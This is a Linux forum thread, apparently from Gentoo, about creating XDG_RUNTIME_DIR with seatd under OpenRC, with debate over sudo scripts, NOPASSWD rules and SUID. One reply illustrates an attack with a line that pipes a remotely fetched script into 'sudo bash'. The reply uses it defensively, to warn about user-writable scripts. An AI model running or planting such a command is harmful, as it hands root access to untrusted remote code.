guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Wed May 03, 2023 1:29 pm Post subject: no /run/user folder, switching from openrc elogind to seatd |
I used to use openrc + elogind on my laptop.
I am trying seatd instead of elogind today.
I removed the elogind USE flag from make.conf, re-emerged and started seatd according to https://wiki.gentoo.org/wiki/Seatd,
but I get an "XDG_RUNTIME_DIR not set" error when I start the wayland compositor.
According to https://forums.gentoo.org/viewtopic-p-8755871.html, I need to export XDG_RUNTIME_DIR=/run/user/${id -u}.
But I don't have a user folder under /run.
What shall I do? Create /run/user manually? What permissions should I set on it?
GDH-gentoo Veteran
Joined: 20 Jul 2019 Posts: 1779 Location: South America
Posted: Wed May 03, 2023 3:18 pm Post subject: |
Have a look at this (from seatd's author).
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Wed May 03, 2023 11:11 pm Post subject: |
@GDH-gentoo, thanks! The script works for me and I can start my DWL wayland compositor with seatd now.
UPDATE: I thought it worked, but after restarting the computer it fails again.
When I first tried the script, I added it into /etc/profile, or ~/.profile. Then in a tty, sudo su and then source /etc/profile to run the script. After that I can start the wayland compositor after exiting sudo.
But after restarting the computer, the /run/user folder disappears, and the script doesn't have permission to create it; I think I have to sudo to gain the permission. But how can I do it automatically at login?
I tried PAM_RUNDIR.so, adding it into /etc/pam.d/system-login, but I did not see /run/user created.
I am using openrc; how do I check whether PAM modules are called?
The s-toolbox solution link needs authentication and I don't have access to it.
Jimmy Jazz Guru
Joined: 04 Oct 2004 Posts: 333 Location: Strasbourg
Posted: Thu May 04, 2023 12:26 pm Post subject: |
Like you, I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory.
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Mon May 08, 2023 2:19 am Post subject: |
I just added sudo in front of the commands, and added this ~/xdg_run_user script into the script I launch the wayland compositor with. It's OK now, just that I need to input the password for sudo every time I start the wayland compositor from a tty.
guyuming@localhost ~/personal/gentoo $ cat ~/xdg_run_user
# Configuration because seatd does not do this for the wayland compositor
YOUR_USER=$(id -u)
YOUR_GROUP=$(id -g)
# exported so that the compositor started afterwards sees it
export XDG_RUNTIME_DIR=/run/user/$YOUR_USER
## Delete existing directory, create a new one and set permissions
sudo rm -rf "$XDG_RUNTIME_DIR"
sudo mkdir -p "$XDG_RUNTIME_DIR"
sudo chown "$YOUR_USER:$YOUR_GROUP" "$XDG_RUNTIME_DIR"
sudo chmod 700 "$XDG_RUNTIME_DIR"
franzf Advocate
Joined: 29 Mar 2005 Posts: 4565
Posted: Mon May 08, 2023 6:14 am Post subject: |
guyuming wrote:
    It's OK now, just that I need to input the password for sudo every time I start the wayland compositor from a tty.
You can configure sudo to allow a user to run certain commands without having to enter a password, via NOPASSWD in the sudoers config.
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
Posted: Mon May 08, 2023 9:15 am Post subject: |
franzf wrote:
    guyuming wrote:
        It's OK now, just that I need to input the password for sudo every time I start the wayland compositor from a tty.
    You can configure sudo to allow a user to run certain commands without having to enter a password, via NOPASSWD in the sudoers config.
From a security point of view, you will make a bad situation even worse. The bad situation is that you have a file that is writeable by the normal, unprivileged user. An attacker can therefore write his own code into the file, e.g.
Code:
wget -q -O - "$some_evil_source" | sudo bash
Currently the attacker needs to wait until the user enters the password during system startup. If you allow certain commands to execute without a password, you will probably give an attacker the possibility to get privileged access to the system immediately.
Therefore I highly recommend following the guide https://git.sr.ht/~kennylevinsen/seatd-docs/tree/master/item/index.md#xdg_runtime_dir-not-set and using a script that is owned by "root:root" and writeable only by root. This script should be executed at startup before you log in (OpenRC or systemd).
Hu Administrator
Joined: 06 Mar 2007 Posts: 22954
Posted: Mon May 08, 2023 2:58 pm Post subject: |
Recreating the directory could be done at boot via systemd-tmpfiles, but this seems like something that should be handled by the login session tracker.
Anon-E-moose Watchman
Joined: 23 May 2008 Posts: 6188 Location: Dallas area
Posted: Mon May 08, 2023 4:25 pm Post subject: |
On my system (openrc) I just create the directory in /tmp.
Code:
export XDG_RUNTIME_DIR=/tmp/.runtime-${USER}
if [[ ! -e $XDG_RUNTIME_DIR ]]
then
    mkdir -p "${XDG_RUNTIME_DIR}"
    chmod 0700 "${XDG_RUNTIME_DIR}"
fi
# /tmp is world-writable: warn if the path is not a directory we own
# (another local user could have created the same path first)
[[ -d $XDG_RUNTIME_DIR && -O $XDG_RUNTIME_DIR ]] || echo "warning: $XDG_RUNTIME_DIR is not a directory owned by $USER" >&2
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Wed May 10, 2023 8:41 pm Post subject: |
Thanks all!
@sMueggli, the permissions of my script file to start the wayland compositor are as follows. Only I have write permission to this file, so how can any other normal user inject script into it?
Code:
guyuming@localhost ~/rfm $ ls -l ~/dwl.sh
-rwxr-xr-x 1 guyuming guyuming 351 May 5 11:00 /home/guyuming/dwl.sh
For openrc to run the script as root to create the user folder, I did some web searching: my understanding is that I should create a so-called openrc service file to wrap the script in. I am not so familiar with the openrc service file format. Is there any way for openrc to run a script directly?
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
Posted: Thu May 11, 2023 7:00 am Post subject: |
guyuming wrote:
    @sMueggli, the permissions of my script file to start the wayland compositor are as follows. Only I have write permission to this file, so how can any other normal user inject script into it?
The attacker only needs one exploitable vulnerability to open a shell or a reverse shell, or to exploit a remote code execution vulnerability. Every program that you are using is a possible entry point (e.g. Firefox).
Doing it with systemd-tmpfiles should be easy (apart from studying the manuals).
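The two suggestions above (sMueggli's root-owned script run at startup, and the question of how openrc can run such a script directly) put into a concrete form, as an added example that is not code from this thread, from seatd or from Gentoo: OpenRC's `local` service runs every executable `/etc/local.d/*.start` script as root during boot, so this file saved as `/etc/local.d/xdg-runtime-dir.start` (assumed file name; `RUNTIME_USER` and the user name `guyuming` are assumptions too) creates `/run/user/<uid>` before anyone logs in, and the compositor start script then needs no sudo at all.

```shell
#!/bin/sh
# Added example: create a per-user XDG_RUNTIME_DIR as root at boot.
# Intended location: /etc/local.d/xdg-runtime-dir.start (assumed name),
# enabled with "rc-update add local default". The user name is an assumption.
RUNTIME_USER=${RUNTIME_USER:-guyuming}

# make_runtime_dir BASE USER: create BASE/<uid> with mode 0700 owned by USER.
# Prints the directory path on success; returns non-zero on any problem.
make_runtime_dir() {
    base=$1
    user=$2
    uid=$(id -u "$user") || return 1
    gid=$(id -g "$user") || return 1
    dir="$base/$uid"

    # BASE (/run/user on a real system) must exist and must not be writable
    # by other users, or anyone could pre-create entries underneath it.
    if [ ! -d "$base" ]; then
        mkdir -p "$base" || return 1
        chmod 0755 "$base" || return 1
    fi

    # Refuse to reuse anything that is not a plain directory: a symlink here
    # would make the chown/chmod below act on whatever it points to.
    if [ -L "$dir" ] || { [ -e "$dir" ] && [ ! -d "$dir" ]; }; then
        echo "refusing: $dir exists and is not a directory" >&2
        return 1
    fi
    [ -d "$dir" ] || mkdir "$dir" || return 1

    # Owner-only access: the compositor's and seatd's sockets will live here.
    chown "$uid:$gid" "$dir" || return 1
    chmod 0700 "$dir" || return 1
    printf '%s\n' "$dir"
}

# When run as root (as the local service does), set up the configured user.
if [ "$(id -u)" -eq 0 ]; then
    make_runtime_dir /run/user "$RUNTIME_USER"
fi
```

The function is idempotent, so rerunning the service after a reboot or a manual `rc-service local restart` simply re-applies the ownership and mode.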
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Thu May 18, 2023 2:08 am Post subject: |
@sMueggli
But I seldom (if ever) run Firefox with sudo. If some bad guy can control my Firefox remotely, how can he use Firefox to break the local file permission system to do something that needs root?
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
Posted: Thu May 18, 2023 9:37 am Post subject: |
guyuming wrote:
    @sMueggli
    But I seldom (if ever) run Firefox with sudo. If some bad guy can control my Firefox remotely, how can he use Firefox to break the local file permission system to do something that needs root?
Firefox is running with the normal user's privileges. And the file xdg_run_user is owned by the normal user and has write permission for the normal user. So the attacker is able to inject "malicious" code into the file. The attacker then just needs to wait until you execute the script (and enter the password).
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Sat May 27, 2023 7:12 am Post subject: |
@sMueggli, thanks.
According to your logic, any script owned by my normal user account is not safe if it contains sudo, not just the script to start the wayland compositor.
What if I change the owner of the scripts (dwl.sh, the script I use to start the wayland compositor, and the script xdg_run_user) to root, and give my normal user only execute permission on these scripts? Will this be much safer?
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
Posted: Sat May 27, 2023 7:34 am Post subject: |
@sMueggli,
I am also thinking of using the SUID permission for the scripts that need to run with sudo, so I don't need to enter a password anymore.
But I see talk on the web saying that SUID is not safe; they recommend using password-less sudo instead, that is, adding something like the following into /etc/sudoers. Why?
Code:
normal_user ALL=(ALL) NOPASSWD:/usr/local/bin/sleep.sh
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
Posted: Wed May 31, 2023 8:53 am Post subject: |
guyuming wrote:
    According to your logic, any script owned by my normal user account is not safe if it contains sudo, not just the script to start the wayland compositor.
Basically yes, unless you are checking every script that contains sudo prior to executing it.
guyuming wrote:
    What if I change the owner of the scripts (dwl.sh, the script I use to start the wayland compositor, and the script xdg_run_user) to root, and give my normal user only execute permission on these scripts? Will this be much safer?
Setting up the runtime directory is something that the "root" user can do before you log in. Therefore I suggest putting the script in a place where it belongs to root, e.g. somewhere under /etc.
I do not know the dwl.sh script, so I cannot and do not want to make any recommendation. I am using Sway and I do not need any elevated privileges to start Sway.
I do not recommend the use of SUID for "private" stuff. SUID makes sense for certain binaries such as /usr/bin/passwd, but I would not use it if there are other possibilities.
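The ownership condition sMueggli keeps coming back to (the sudo target must be modifiable by root only, otherwise any code running as the normal user can rewrite it and a NOPASSWD rule hands it root) as a check you can run before adding a sudoers line like the one quoted above. This is an added example, not code from the thread; the path `/usr/local/bin/sleep.sh` is the constructed one from the quoted sudoers line, and the optional owner-uid argument exists only so the check can be exercised without root.

```shell
#!/bin/sh
# Added example: verify that a script named in a NOPASSWD sudoers rule can
# only be modified by its expected owner (root by default). Both the file
# and its parent directory are checked, since a writable directory lets the
# file be replaced wholesale. Symlinks are refused outright.
# Usage: safe_sudo_target /usr/local/bin/sleep.sh [owner_uid]

# safe_sudo_target PATH [OWNER_UID]: return 0 only if PATH is a regular
# file, not a symlink, and PATH and dirname(PATH) are owned by OWNER_UID
# (default 0) and carry no group or world write bit.
safe_sudo_target() {
    path=$1
    want_uid=${2:-0}
    if [ -L "$path" ] || [ ! -f "$path" ]; then
        echo "$path: not a regular file (or is a symlink)" >&2
        return 1
    fi
    for p in "$path" "$(dirname "$path")"; do
        owner=$(stat -c %u "$p") || return 1
        perms=$(stat -c %A "$p") || return 1   # e.g. -rwxr-xr-x
        if [ "$owner" != "$want_uid" ]; then
            echo "$p: owned by uid $owner, expected uid $want_uid" >&2
            return 1
        fi
        # %A positions: 1 type, 2-4 user, 5-7 group, 8-10 other;
        # a 'w' at position 6 or 9 means group- or world-writable.
        case $perms in
            ?????w*|????????w*)
                echo "$p: writable by group or others ($perms)" >&2
                return 1 ;;
        esac
    done
    return 0
}

# Stand-alone use: check the path given on the command line.
if [ $# -ge 1 ]; then
    safe_sudo_target "$@" && echo "$1: acceptable as a NOPASSWD target"
fi
```

A script that fails this check should be moved to a root-owned location (for example under /etc, as suggested above) and chowned to root:root before any sudoers rule references it.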
Acatorn n00b
Joined: 12 Jan 2020 Posts: 7 Location: Faerûn
Posted: Sat Jan 04, 2025 10:23 pm Post subject: |
Jimmy Jazz wrote:
    Like you, I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory.
I'm really, really sorry for necroposting here, but I'm very interested in this one.
Jimmy Jazz,
How did you run Xorg using seatd? Did you use it combined with elogind? Is Xorg running as root in that setup?
The last few days I tried to run rootless Xorg (-suid) with seatd (with only these two USE flags enabled: +builtin +server) and greetd with tuigreeter, and I couldn't get it to work. Standard Xorg error - parse_vt_settings cannot open /dev/tty0 permission - when I try to log in.
It seems that seatd support is not implemented in upstream xorg-server (which is in the official Gentoo repo), so there is no chance at all that it would work. The only xorg-server patched for seatd support I found is in the Devuan repo:
https://git.devuan.org/devuan/xorg-server
And here's the link to the initial patch that enables seatd support in Devuan's xorg-server:
https://git.devuan.org/devuan/xorg-server/src/branch/suites/experimental/debian/patches/0001-Support-libseat.patch
Did you use that?